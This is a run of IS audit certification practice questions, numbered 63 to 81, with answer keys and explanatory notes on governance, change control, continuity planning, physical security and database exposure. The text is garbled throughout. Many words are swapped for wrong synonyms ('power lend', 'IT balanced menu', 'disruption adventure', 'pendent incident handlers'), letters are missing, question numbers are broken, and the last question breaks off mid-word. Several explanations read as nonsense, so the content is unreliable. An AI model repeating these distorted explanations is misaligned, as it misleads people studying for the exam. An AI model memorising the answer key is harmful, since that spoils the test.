63. T he PRIMARY objective of implementing corporate governance by an organizations management is to A. provide strategic direction. B. control business operations.C. align IT with business. D. implement best practices. ANSWER A NOTE Corporate governance is a set of management practices to provide strategic direction, thereby ensuring that goals are achievable, risks are properly addressed and organizational resources are properly utilized. Hence, the primary objective of corporate governance is to provide strategic direction. Based on the strategic direction, business operations are direct and controlled. 64. To determine if unauthorized changes have been made to production enter the BEST audit procedure is to A. xamine the change control system records and trace them forward to object code files. B. review access control permissions operating within the production program libraries. C. examine object code to find instances of changes and trace them back to change control records. D. re view change approved designations established within the change control system. ANSWER C NOTE The procedure of examining object code files to establish instances of code changes and tracing these back to change control system records is a substantive test that nowadays addresses the risk of unauthorized code changes.The other choices are valid procedures to apply in a change control audit but they do not directly address the risk of unauthorized code changes. 65. When reviewing an active project, an IS auditor observed that, because of a drop-off in anticipated benefits and increased costs, the business case was no longer valid. The IS auditor should recommend that the A. project be discontinued. B. business case be updated and possible corrective actions be identified. C. project be returned to the project sponsor for reapproval. D. project be ompleted and the business case be updated later. ANSWER B NOTE An IS auditor should not recommend discontinuing or completing the project before reviewing an updated business case. The IS auditor should recommend that the business case be kept current throughout the project since it is a key input to decisions made throughout the life of any project. 66. Which of the following audit techniques would BEST aid an auditor in determining whether there have been unauthorized program changes since the last authorized program update? A. Test data run B. Code review C.Automated code comparison D. Review of code migration procedures ANSWER C NOTE An automated code comparison is the process of comparing two versions of the same program to determine whether the two correspond. It is an efficient technique because it is an automated procedure. Test data runs permit the auditor to depone the processing of preselected transactions, but provide no evidence about unexercised portions of a program. Code review is the process of reading program source code listings to determine whether the code contains potential errors or inefficient statements.A code review can be used as a means of code comparison but it is inefficient. The review of code migration procedures would not detect program changes. 67. Doing which of the following during peak production hours could result in unexpected downtime? A. playing data migration or tape backup B. Performing preventive maintenance on electrical systems C. Promoting applications from development to the staging environment D. Replacing a failed power lend in the core router of the data center ANSWER B NOTE Choices A and C are processing events which may impact performance, but ould not cause downtime. Enterprise-class routers have redundant hot-swappable power supplies, so replacing a failed power planning should not be an issue. Preventive maintenance activities should be scheduled for non-peak times of the day, and sooner during a maintenance window time period. A mishap or hap caused by a maintenance prole could result in unplanned downtime. 68. Which of the following is the MOST robust method for disposing of magnetized media that contains confidential information? A. demagnetise B. Defragmenting C. Erasing D. Destroying ANSWER DNOTE Destroying magnetic media is the only way to manipulate that confidential information cannot be recovered. Degaussing or demagnetizing is not sufficient to fully erase information from magnetic media. The purpose of defragmentation is to eliminate fragmentation in file systems and does not remove information. Erasing or deleting magnetic media does not remove the information this method simply changes a files indexing information. 69. The MAIN criterion for determining the severity level of a service disruption adventure is A. cost of recovery. B. negative public opinion. C. geographical location. D. downtime.ANSWER D NOTE The longer the period of time a client cannot be serviced, the greater the severity of the incident. The cost of recovery could be minimal yet the service downtime could have a major impact . detrimental public opinion is a emblem of an incident. Geographic location does not determine the severity of the incident. 70. During the design of a business continuity plan, the business impact analysis (BIA) identifies critical processes and supporting applications. This will PRIMARILY influence the A. responsibility for maintaining the business continuity plan. B. criteria for selecting a recovery site provider.C. recovery strategy. D. responsibilities of key personnel. ANSWER C NOTE The most appropriate strategy is selected based on the relative risk level and criticality identified in the business impact analysis (BIA. ), The other choices are made after the selection or design of the appropriate recovery strategy. 71. What is the net level of the IT governance maturity model where an IT balanced menu exists? A. Repeatable but Intuitive B. Defined C. Managed and Measurable D. Optimized ANSWER B NOTE Defined (level 3) is the last level at which an IT balanced scorecard is defined. 2. During the system testing phase of an application development project the IS auditor should review the A. conceptual design specifications. B. vendor contract. C. error reports. D. program change requests. ANSWER C NOTE Testing is crucial in determining that user requirements have been validated. The IS auditor should be involved in this phase and review error reports for their precision in recognizing erroneous data and review the procedures for resolving errors. A conceptual design specification is a document prepared during the requirements definition phase. A vendor ontract is prepared during a software acquisition process. Program change requests would normally be reviewed as a part of the postimplementation phase. 73. When reviewing procedures for emergency changes to programs, the IS auditor should verify that the procedures A. allow changes, which will be completed using after-the-fact follow-up. B. allow undocumented changes directly to the production librar y. C. do not allow any emergency changes. D. allow programmers unceasing access to production programs. ANSWER A NOTE There may be situations where emergency fixes are required to resolve system problems.This involves the use of special logon IDs that grant programmers temporary access to production programs during emergency situations. Emergency changes should be completed using after-the-fact follow-up procedures, which ensure that normal procedures are retroactively applied otherwise, production may be impacted. Changes made in this spurt should be held in an emergency library from where they can be moved to the production library, following the normal change management process. Programmers should not directly alter the production library nor should they be allowed permanent access to production programs. 4. Though management has stated otherwise, an IS auditor has reasons to believe that the organization is using software that is not licensed. In this situation, the IS auditor should A. include the statement of management in the audit report. B. identify whether such software is, indeed, being used by the organization. C. reconfirm with management the usage of the software. D. discuss the issue with senior management since reporting this could have a negative impact on the organization. ANSWER B NOTE When there is an indication that an organization might be using nlicensed software, the IS auditor should obtain sufficient evidence before including it in the report. With look on to this matter, representations obtained from management cannot be independently verified. If the organization is using software that is not licensed, the auditor, to maintain objectivity and independence, must include this in the report. 75. Which of the following would be BEST prevented by a raised floor in the computer machine room? A. injure of wires around computers and servers B. A power failure from static electricity C. Shocks from earthquakes D. Water overspill damage ANSWER ANOTE The primary reason for having a raised floor is to enable power cables and data cables to be installed underneath the floor. This eliminates the safety and damage risks posed when cables are placed in a spaghetti-like contrive on an open floor. Static electricity should be avoided in the machine room therefore, measures such as specially manufacture carpet or shoes would be more appropriate for static prevention than a raised floor. Raised floors do not address shocks from earthquakes. To address earthquakes, anti-seismic architecture would be required to establish a quake-resistant structural framework.Computer equipment needs to be protect against water. However, a raised floor would not prevent damage to the machines in the event of overhead water pipe leakage. 76. The network of an organization has been the victim of several intruders attacks. Which of the following measures would allow for the early detection of such incidents? A. Antivirus software B. Hardening the servers C. Screening routers D. Honeypots ANSWER D NOTE Honeypots can collect data on precursors of attacks. Since they serve no business function, honeypots are hosts that have no authorized users other than the honeypot administrators.All activity directed at them is considered suspicious. Attackers will scan and attack honeypots, giving administrators data on new trends and attack tools, particularly malicious code. However, honeypots are a supplement to, not a replacement for, properly securing networks, systems and applications. If honeypots are to be used by an organization, pendent incident handlers and intrusion detection analysts should manage them. The other choices do not provide indications of potential attacks. 77. The purpose of a deadman door controlling access to a computer facility is primarily to A. prevent piggybacking.B. prevent toxic gases from entering the data center. C. starve a fire of oxygen. D. prevent an to a fault rapid entry to, or exit from, th e facility. ANSWER A NOTE The purpose of a deadman door controlling access to a computer facility is primarily intended to prevent piggybacking. Choices B and C could be accomplished with a single self-closing door. Choice D is invalid, as a rapid exit may be necessary in some circumstances, e. g. , a fire. 78. The MOST important reason for an IS auditor to obtain sufficient and appropriate audit evidence is to A. comply with restrictive requirements. B. rovide a basis for drawing reasonable conclusions. C. ensure complete audit coverage. D. perform the audit according to the defined scope. ANSWER B NOTE The scope of an IS audit is defined by its objectives. This involves identifying control weaknesses relevant to the scope of the audit. Obtaining sufficient and appropriate evidence assists the auditor in not only identifying control weaknesses but also documenting and validating them. Complying with regulatory requirements, ensuring coverage and the execution of audit are all rele vant to an audit but are not the reason wherefore sufficient and relevant evidence is required. 9. During the audit of a database server, which of the following would be considered the GREATEST exposure? A. The password does not expire on the administrator account B. default option global security settings for the database remain unaltered C. Old data have not been purged D. Database activity is not fully logged ANSWER B NOTE Default security settings for the database could allow issues like blank user passwords or passwords that were the same as the username. Logging all database activity is not practical. mischance to purge old data may present a performance issue but is not an immediate security concern.Choice A is an exposure but not as serious as B. 80. An IS auditor finds that a DBA has read and write access to production data. The IS auditor should A. accept the DBA access as a common practice. B. assess the controls relevant to the DBA function. C. recommend the immediate revocation of the DBA access to production data. D. review user access authorizations approved by the DBA. ANSWER B NOTE It is good practice when finding a potential exposure to look for the best controls. Though granting the database administrator (DBA) access to production data might be a common practice, the IS auditor should evaluate the relevant controls.The DBA should have access based on a need-to-know and need-to-do basis therefore, revocation may remove the access required. The DBA, typically, may need to have access to some production data. Granting user authorizations is the responsibility of the data owner and not the DBA. 81. What should be the GREATEST concern to an IS auditor when employees use portable media (MP3 players, flash drives)? A. The copying of sensitive data on them B. The copying of songs and videos on them C. The cost of these devices multipl